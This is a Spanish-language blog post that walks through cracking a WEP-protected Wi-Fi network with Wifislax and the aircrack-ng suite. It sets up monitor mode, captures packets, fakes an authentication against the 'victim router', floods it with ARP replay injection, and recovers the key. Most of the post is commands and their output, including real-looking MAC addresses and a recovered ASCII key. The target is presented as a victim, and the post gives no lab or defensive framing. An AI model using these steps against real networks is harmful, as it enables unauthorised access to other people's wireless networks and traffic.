wifislax->Asistencia chipset->Asistencia Intel pro wireless-> Cargar ipw3945 inyeccion – ipwraw-ng
NOTA: con este comando configuramos tambien la interfas en modo monitor
#airmon-ng start wifi0 6
2. #iwconfig, para revisar la configuracion en la que quedó la interfaz de red, en este caso la interfaz de red se llama wifi0.
3. Configuramos la velocidad de transmisión a 1MB para evitar problemas de transmisión.
#iwconfig wifi0 rate 1M
4. Desues de haber identificado que la interfaz halla quedado en modo monitor, empezaremos a detectar las redes que se encuentren en el canal 6 por el cual nuestra interfaz esta escuchando. Para esto utilizamos el siguiente comando:
#airodump-ng -w aaaa -c6 wifi0
donde aaaa puede ser cualquier nombre para este archivo.
wifislax-> Herramientas wireless -> Kismet .
Seguidamente aparecera una ventana (Lanzador kismet) para configurar cual es la interfaz de red:
Dispositivo: wifi0
Driver: ipw2915
Nombre: wifislax
En este ejemplo encontramos una ESSID:LD, BSSID:
5. Seguidamente despues de haber escogido la red con encriptacino WEP que vamos a atacar, ejecutamos el siguiente comando:
#aireplay -1 0 -e ESSID -a MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0
#aireplay -1 0 -e LD -a 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0
En este paso nuestra maquina tiene que engancharse con el router victima, apareciendo el siguiente mensaje despues de haber dado enter en el comando mensionado:
…...
Enviando peticion de autentificacion
Autentificacion conseguida
Enviando peticion de asociacion
Asociacion conseguida
6. Ahora empezaremos a intectar paquetes usando el siguiente comando:
#aireplay-ng -3 -x600 -b MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0
#aireplay-ng -3 -x600 -b 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0
Ahora se comenzaran a enviar paquetes. Debemos esperar a que se envien un poco mas de 100.000 paquetes.
7. Logrando la cantidad de paquetes indicado procederemos a encontrar la clave. Para esto haremos uso del siguiente comando:
#aircrack-ptw LD-01.cap
Este archivo se genera automaticamente con el nombre del ESSID en el directorio raiz. Este comando me entrega la clave tanto en exadecimal como en su equivalente ASCII.
.....
Equivalente en ASCII: LADINO4763356
No hay comentarios:
Publicar un comentario